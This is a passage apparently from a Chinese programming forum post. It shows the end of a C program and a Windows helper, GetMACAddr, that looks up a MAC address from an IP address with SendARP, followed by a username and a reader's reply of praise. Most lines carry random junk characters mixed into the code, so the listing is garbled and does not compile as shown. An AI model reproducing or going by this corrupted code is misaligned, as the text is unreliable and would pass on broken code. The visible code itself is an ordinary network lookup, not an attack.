0 F, [4 a8 e: F) z* t5 {      return 0;
    }
0 @) Q+ C" p% }9 h' ?0 S    Sleep(1000);
6 |5 J& T, w7 m  }
# V" t6 v- O& W. o9 ~1 a$ A! H  return 0;
}
/ O2 H. m, m- i9 L: x
# S8 @4 c' l7 T+ R9 T//
//功能：输入IP取得对应的MAC地址
//
BOOL GetMACAddr(DWORD DestIP, char *pMAC)
{
& P, S- y* ]% w  DWORD  dwRet;
5 ?% `8 x" R( `1 j5 s2 m  ULONG  ulLen = 6, pulMac[2];
" E& m' `; Z2 J& K6 z  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
  if(dwRet == NO_ERROR)
+ \2 {1 w- t, @* q  {
, q% w8 Z$ o' D) N$ V    memcpy(pMAC, pulMac, 6);
    return TRUE;
/ u' X" ~8 ?: `7 F  }
  else return FALSE;
9 p2 G7 _: e8 H$ L% O  q+ k" ~}

wy617958197

大侠好厉害啊